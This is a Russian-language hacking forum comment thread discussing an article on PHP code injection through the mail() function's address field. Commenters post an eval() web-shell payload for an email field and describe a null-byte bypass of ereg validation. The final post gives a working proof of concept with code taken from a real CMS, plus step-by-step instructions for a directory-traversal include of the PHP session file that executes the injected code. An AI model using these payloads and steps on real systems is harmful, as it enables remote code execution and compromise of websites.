2 pampom: У меня нет кошелька, мне он не нужен и никогда не был нужен)) 2 [AVT]: Мужик Риспект. Но всё равно ты не прав Не всегда
Согласен. Но хакинг - настолько творческий и непредсказуемый процесс, что иногда случаются такие курьезы.
Пасиб за статью ))А на сервере может быть и несколько форм регистрации+mysql_quotes_gpc может и не на весь сервер распространяться...вот)).На правительственных и учрежденческих сайтах так оно и бывает(форм бывает до 5-6)
вы ещё не забывайте что в 50% случаев нехватает прав не чтение error_log и access_log И кеш, локал инклуды разные бывают
перечитал всю статью. Все не верно, человек явно не понимает в кодинге. Расчитано на человека который не понимает в кодинге или не понимает сути Воn определённый код: Code: <?php mail("[email protected]", "$the_subject", $message, "From: webmaster@ example.com \r\n" ."X-Mailer: PHP/" . phpversion()); ?> Если бы я писал код во первых я бы проверял данные при входе и при отправке от клиента. Воланд считает что можно сделать так или так Code: [email protected], <?=eval($_GET[c])?> Это его слова. Но все вкладываться в переменные $the_subject, а не напрямую. Причем полученные данные будут фильтроваться. Spyder Вариантов достаточно по мимо чтения чтение error_log и access_log, к примеру если на хосьте есть фаилообменник можно подгрузить скрипт оттуда, или форма для загрузки картинок где не фильтруется содержаниев ней PHP кода.Хотя соглашусь всё зависит от прав.
Квест, а ты явно не понимаешь в хакинге, перечитай статью еще три раза, потом проверь все написаное на живом примере, а потом отпишись.
Twoster поверь мне понимаю. Какраз в ходе проверки и увидел подобный вариан как у меня.Видимо те движки которыя я проверял имели отлиную от найденного волондом структуру. Если не трудно- живой пример в студию.
_Quest_ все работает в тех условиях что описал [x26]VOLAND Наверно не стоит свою проблему с кривыми руками перелаживать на других.
PaCo приведи пример. Твои слова обсолюто ни чем не аргументированны. Я поискал и замети то что отписал выше. Покажеш где это работает я признаю что ты прав.
Квест, раз уж ты все понимаешь, то советую еще больше расширить свои кругозор, во-первых прочти статью Электа про обход фильтрации ereg null-байтом (это про %00), во-вторых ты пишешь про тему сообщения, а в заметке говорится о адресе, прочти документацию еще раз и узри что там адреса получателей заносятся через запятую, т.о. Если первым значением до занятой будет валидныи адрес, а после запятой наш зловредный кулхакерский код, то все прекрасно выполнится! П.с. Не обижайся, я раньше тоже таким был, сейчас приучили сначала читать, потом спорить.
Twoster я всеголиш пытаюсь разобратся вышеописанное я читал и матерьял действительно проверен и усвоен.Обижатся ненашто тк все ошибки это не минус - это опыт.Ну рас ни кто не готов показать, поиду искать дальше.В любом случае спасибо за совет.
попадёшь в роа, увидишь там реальный пример мной написаный воланд пришет про ereg-подобные функции которые уязвимы к нулбайту Если ты не нашёл ничего подобного в нескольких цмс - это не значит что такого не бывает
Вот тебе РАБОЧИЙ пример: PHP: <?php session_start(); $_POSTT['mail']= "[email protected]" . chr(00) . '<?php phpinfo(); ?>' ;//что бы не писать форму // Взято с реального двига - advanced poll - include/class_pollcomment.php - 295 стр. if (!eregi("^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@([0-9a-z][0-9a-z-]*[0-9a-z]\\.)+[0-9a-z]{1,6}$", $_POSTT['mail']) ) { $_POSTT['mail'] = ''; } //echo $_POSTT['mail']; $to = $_POSTT['mail']; $subject = 'the subject'; $message = 'hello'; $headers = 'From: [email protected]' . "\r\n" . 'Reply-To: [email protected]' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); if(mail($to, $subject, $message, $headers)){// $_SESSION['mail']=$_POSTT['mail'];; } //LFI тоже взято с одного самопального движка $page=@file_exists($_GET['page']) ? $_GET['page'] : ''; if(!empty($page)){ include($page); } Далее смотришь в кукисах(в адресной строке) свой индентификатор сессии(если ты такой знаток как пишешь то разберешься что это), далее чистишь кукисы или заходишь с другова браузера(важно что бы твой идентификатор сессии не передовался иначе инклюд не выйдет, по крайне мере у меня из за этого не выходил нигде где бы я ни пробывал, может это связано с тем php производит запись в файл сессии и и инклюд не происходит): имя_скрипта.php?page=/../../../../../../../TMP/sess_тут_индетификатор_сессии_из_кукисов_или_из_адресной_строки
